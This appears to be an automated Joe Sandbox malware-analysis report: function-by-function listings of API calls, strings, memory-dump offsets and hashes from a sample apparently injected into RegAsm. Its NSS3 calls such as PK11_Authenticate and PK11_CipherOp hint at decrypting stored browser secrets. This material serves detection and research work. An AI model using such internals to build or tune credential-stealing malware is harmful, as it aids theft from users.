Function 6CA3BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CA3BDCA

Part of subcall function 6CA90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA387ED,00000800,6CA2EF74,00000000), ref: 6CA91000
Part of subcall function 6CA90FF0: PR_NewLock.NSS3(?,00000800,6CA2EF74,00000000), ref: 6CA91016
Part of subcall function 6CA90FF0: PL_InitArenaPool.NSS3(00000000,security,6CA387ED,00000008,?,00000800,6CA2EF74,00000000), ref: 6CA9102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA3BDDB

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA3BDEC

Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CA3BE03

Part of subcall function 6CA8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA88D2D,?,00000000,?), ref: 6CA8FB85
Part of subcall function 6CA8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA8FBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA3BE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA3BE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA3BE3B

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 5f1e93c5732515ee885fa16df2c0696fd380d76658eea13c7edd4a6523c3ddfd
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: F6017B65A4062126F600326ABD02FA7369D4F5068DF240130FF0DDABC2FB51E19D82B2

Function 0041FA24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041FA6D
DName::operator+.LIBCMT ref: 0041FA74
DName::DName.LIBCMT ref: 0041FA96
DName::operator+.LIBCMT ref: 0041FA9D
DName::operator+.LIBCMT ref: 0041FAA4

Strings

throw(, xrefs: 0041FA65, 0041FA8E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction ID: f88cabbda18bcd4624fad7201f608a4b7bec8680ec46b3ab11068729d5ffd4ff
Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction Fuzzy Hash: 87019B70600208BFCF14EF64D852EED77B5EF44748F10406AF905972A5DA78EA8B878C

Function 6CAC1C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAC1C74

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

DeleteCriticalSection.KERNEL32(?), ref: 6CAC1C92
free.MOZGLUE(?), ref: 6CAC1C99
DeleteCriticalSection.KERNEL32(?), ref: 6CAC1CCB
free.MOZGLUE(?), ref: 6CAC1CD2

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 8b56f39fed4d16aeb4dec273e4e4667ab0f7444ff3af3d12a8a97cb24b278bdc
Instruction ID: ad58840486b9aed8c35724a5cfddc59c8b819e686f4c5264f78aa401e5b4035e
Opcode Fuzzy Hash: 8b56f39fed4d16aeb4dec273e4e4667ab0f7444ff3af3d12a8a97cb24b278bdc
Instruction Fuzzy Hash: E90192B1F066205FEE20AFA49E0DB5977B8AB07718F540125EA0BA3A41D735E18C8797

Function 6CB21C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CA23D77,?,?,6CA24E1D), ref: 6CB21C8A
sqlite3_free.NSS3(00000000), ref: 6CB21CB6

Strings

a generated column, xrefs: 6CB21C6C
an index, xrefs: 6CB21C67
a CHECK constraint, xrefs: 6CB21C76, 6CB21C81
non-deterministic use of %s() in %s, xrefs: 6CB21C85

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
API String ID: 1840970956-3705377941
Opcode ID: efb1220e746e77fff9822eadcc3ecd7fa2f11b662c4354c7c72a1b9a6a7396c9
Instruction ID: 3bdbeb85ebad508deb48d857c5343221821406bc96dac61c93b3fe20ee4a9fdd
Opcode Fuzzy Hash: efb1220e746e77fff9822eadcc3ecd7fa2f11b662c4354c7c72a1b9a6a7396c9
Instruction Fuzzy Hash: 4B01F7B5A001805BDB00BF69D802D7277E5EFD634CB19486DED499BF02EB32E896C751

Function 6CA9ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CA9ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CA9EDCE

Part of subcall function 6CA90BE0: malloc.MOZGLUE(6CA88D2D,?,00000000,?), ref: 6CA90BF8
Part of subcall function 6CA90BE0: TlsGetValue.KERNEL32(6CA88D2D,?,00000000,?), ref: 6CA90C15

free.MOZGLUE(00000000,?,?,?,?,6CA9B04F), ref: 6CA9EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CA9EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA9EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CA9EEFB

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 49ade088b175e5bc5658b184d2f2245ae898fe637f1144a6133ace10275aee6b
Instruction ID: ab8286f9014f1887b8b14fa6d13d097ca178ca7c9f1f56be4b5cdf30d4fac5f3
Opcode Fuzzy Hash: 49ade088b175e5bc5658b184d2f2245ae898fe637f1144a6133ace10275aee6b
Instruction Fuzzy Hash: 4A818CB5A102059FEF10CF55DD82AAB77F5BF89308F18442CE8159B752DB31E898CBA1

Function 6CA9CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA9C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CA9DAE2,?), ref: 6CA9C6C2

PR_Now.NSS3 ref: 6CA9CD35

Part of subcall function 6CAF9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB40A27), ref: 6CAF9DC6
Part of subcall function 6CAF9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB40A27), ref: 6CAF9DD1
Part of subcall function 6CAF9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAF9DED

Part of subcall function 6CA86C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA31C6F,00000000,00000004,?,?), ref: 6CA86C3F

PR_GetCurrentThread.NSS3 ref: 6CA9CD54

Part of subcall function 6CAF9BF0: TlsGetValue.KERNEL32(?,?,?,6CB40A75), ref: 6CAF9C07

Part of subcall function 6CA87260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA31CCC,00000000,00000000,?,?), ref: 6CA8729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA9CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CA9CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CA9CE2C

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CA9CE40

Part of subcall function 6CA914C0: TlsGetValue.KERNEL32 ref: 6CA914E0
Part of subcall function 6CA914C0: EnterCriticalSection.KERNEL32 ref: 6CA914F5
Part of subcall function 6CA914C0: PR_Unlock.NSS3 ref: 6CA9150D

Part of subcall function 6CA9CEE0: PORT_ArenaMark_Util.NSS3(?,6CA9CD93,?), ref: 6CA9CEEE
Part of subcall function 6CA9CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CA9CD93,?), ref: 6CA9CEFC
Part of subcall function 6CA9CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CA9CD93,?), ref: 6CA9CF0B
Part of subcall function 6CA9CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CA9CD93,?), ref: 6CA9CF1D

Part of subcall function 6CA9CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CA9CD93,?), ref: 6CA9CF47
Part of subcall function 6CA9CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CA9CD93,?), ref: 6CA9CF67
Part of subcall function 6CA9CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CA9CD93,?,?,?,?,?,?,?,?,?,?,?,6CA9CD93,?), ref: 6CA9CF78

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 2df4720e698a092755a7e35683c147a6214cf0c2fa50223eec5b24f7a0fa51b0
Instruction ID: 28229f55ea145efbfec05a2bd7756124e9f11b0375fd3b93aae4cc83849eac80
Opcode Fuzzy Hash: 2df4720e698a092755a7e35683c147a6214cf0c2fa50223eec5b24f7a0fa51b0
Instruction Fuzzy Hash: FA51D3B6A105009BEB10DF69DD42BAA73F4AF4834CF290524E9169B741EB31ED89CB91

Function 6CA6EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CA6EF38

Part of subcall function 6CA59520: PK11_IsLoggedIn.NSS3(00000000,?,6CA8379E,?,00000001,?), ref: 6CA59542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CA6EF53

Part of subcall function 6CA74C20: TlsGetValue.KERNEL32 ref: 6CA74C4C
Part of subcall function 6CA74C20: EnterCriticalSection.KERNEL32(?), ref: 6CA74C60
Part of subcall function 6CA74C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA74CA1
Part of subcall function 6CA74C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CA74CBE
Part of subcall function 6CA74C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA74CD2
Part of subcall function 6CA74C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA74D3A

PR_GetCurrentThread.NSS3 ref: 6CA6EF9E

Part of subcall function 6CAF9BF0: TlsGetValue.KERNEL32(?,?,?,6CB40A75), ref: 6CAF9C07

free.MOZGLUE(00000000), ref: 6CA6EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA6F016
free.MOZGLUE(00000000), ref: 6CA6F022

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: b11f71f0a71df1cde38e74626d5e845bdb2ab5155d771f9c30aa6e03c6a4bb35
Instruction ID: 03e99ed402437ed96b03451694dbbf24a1fb4eb57261f772049e08d41146bc13
Opcode Fuzzy Hash: b11f71f0a71df1cde38e74626d5e845bdb2ab5155d771f9c30aa6e03c6a4bb35
Instruction Fuzzy Hash: FF4193B1E0010AABDF018FA9DD85BEE7BB9AF48358F044029F914A7750E771C9598BA1

Function 00413259 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413278
StrCmpCA.SHLWAPI(00000000,004367D8), ref: 004132B1
strtok_s.MSVCRT ref: 00413371

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
Instruction ID: 735330a1d008a833b374886be4d947a81621c86a210c44f2da093846d2bcbd8c
Opcode Fuzzy Hash: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
Instruction Fuzzy Hash: 64319671E001099FCB14DF68CC85BAA77A8BB08717F51505BEC05DA191EB7CCB818B4C

Function 6CA42E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CA32D1A), ref: 6CA42E7E

Part of subcall function 6CA907B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA38298,?,?,?,6CA2FCE5,?), ref: 6CA907BF
Part of subcall function 6CA907B0: PL_HashTableLookup.NSS3(?,?), ref: 6CA907E6
Part of subcall function 6CA907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA9081B
Part of subcall function 6CA907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA90825

PR_Now.NSS3 ref: 6CA42EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CA42EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CA32D1A), ref: 6CA42F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CA32D1A), ref: 6CA42F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CA42F81

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: dec01dd90cf1f189a992a2f207ed638e144d433f9acb6007c2944e92bb2466c9
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 1E31E4715011008BE714CE56CD49FAE7265EF80318FE8CB79D429D7AD1EB3198DAC621

Function 6CA30E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6CA30A2C), ref: 6CA30E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CA30A2C), ref: 6CA30E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CA30A2C), ref: 6CA30E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6CA30A2C), ref: 6CA30E90
free.MOZGLUE(00000000), ref: 6CA30EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CA30A2C), ref: 6CA30ED9

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: b31172b212afa08582b0c5e6e8192cdbf52e1c3b1344bd73b7c1b7b88417f80c
Instruction ID: 26d971592995e7562a72f631daea09730702fc314046804bb0dce3ad7bb42f8c
Opcode Fuzzy Hash: b31172b212afa08582b0c5e6e8192cdbf52e1c3b1344bd73b7c1b7b88417f80c
Instruction Fuzzy Hash: 82213176F002A45FEB00556A5CA5B6B72BFDBC1749F3D5035D81CE3681EA60C8D88291

Function 6CA6EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA6EE49

Part of subcall function 6CA8FAB0: free.MOZGLUE(?,-00000001,?,?,6CA2F673,00000000,00000000), ref: 6CA8FAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CA6EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CA6EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CA6EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA6EEB3

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 55131c99d8000435a4ce9a4e3d9c8ac05040dfb0b8946d9ba7c9c3bbb0c6ccc8
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 7421D5B6A002117BEB118E59DC81EABB7A8EF49718F4841A4FD049B741E771DC98C7F1

Function 6CA85ED0 Relevance: 9.1, APIs: 6, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CA85D71), ref: 6CA85F0A
TlsGetValue.KERNEL32 ref: 6CA85F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6CA85F2F
PR_Unlock.NSS3(890008E8), ref: 6CA85F55
PR_SetError.NSS3(00000000,00000000), ref: 6CA85F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6CA85F7D

Part of subcall function 6CA85220: TlsGetValue.KERNEL32(00000000,890008E8,?,6CA85F82,8B4274C0), ref: 6CA85248
Part of subcall function 6CA85220: EnterCriticalSection.KERNEL32(0F6CB50D,?,6CA85F82,8B4274C0), ref: 6CA8525C
Part of subcall function 6CA85220: PR_SetError.NSS3(00000000,00000000), ref: 6CA8528E
Part of subcall function 6CA85220: PR_Unlock.NSS3(0F6CB4F1), ref: 6CA85299
